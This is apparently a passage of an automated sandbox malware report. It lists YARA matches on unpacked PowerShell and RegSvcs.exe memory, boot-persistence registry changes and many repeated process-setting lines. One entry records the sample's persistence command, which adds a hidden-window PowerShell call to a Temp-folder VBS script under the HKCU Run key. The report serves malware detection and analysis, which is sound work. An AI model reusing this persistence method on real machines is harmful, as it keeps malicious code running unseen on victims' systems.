                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848D82375 pushad ; retf 4_2_00007FF848D82399
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848D625ED push eax; retf 6_2_00007FF848D62606
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF848D500BD pushad ; iretd 9_2_00007FF848D500C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF848D50A98 pushad ; ret 9_2_00007FF848D50AE2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FF848D50A98 pushad ; ret 19_2_00007FF848D50AE2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FF848D54204 pushad ; ret 19_2_00007FF848D5422D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FF848D500BD pushad ; iretd 19_2_00007FF848D500C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FF848D46236 push eax; ret 21_2_00007FF848D4623B
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FF848D46329 push ecx; ret 21_2_00007FF848D4632C
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FF848D400BD pushad ; iretd 21_2_00007FF848D400C1

                Boot Survival

                barindex
                Source: Yara matchFile source: 26.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.powershell.exe.240c11b51a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.powershell.exe.1c03cb43b98.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.155c41c7c80.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.powershell.exe.1c03cb40780.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.powershell.exe.1c03cb43b98.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.155c41c7c80.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.155c41c4868.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.powershell.exe.240c11b1d88.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.powershell.exe.240c11b51a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000013.00000002.2417662894.00000240C11A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2090885360.00000155C41C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.2331186217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.2793866781.000001C03CB30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7896, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3872, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run _______________________-------------Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run _______________________------------- Powershell.exe -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run _______________________-------------Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run _______________________-------------Jump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
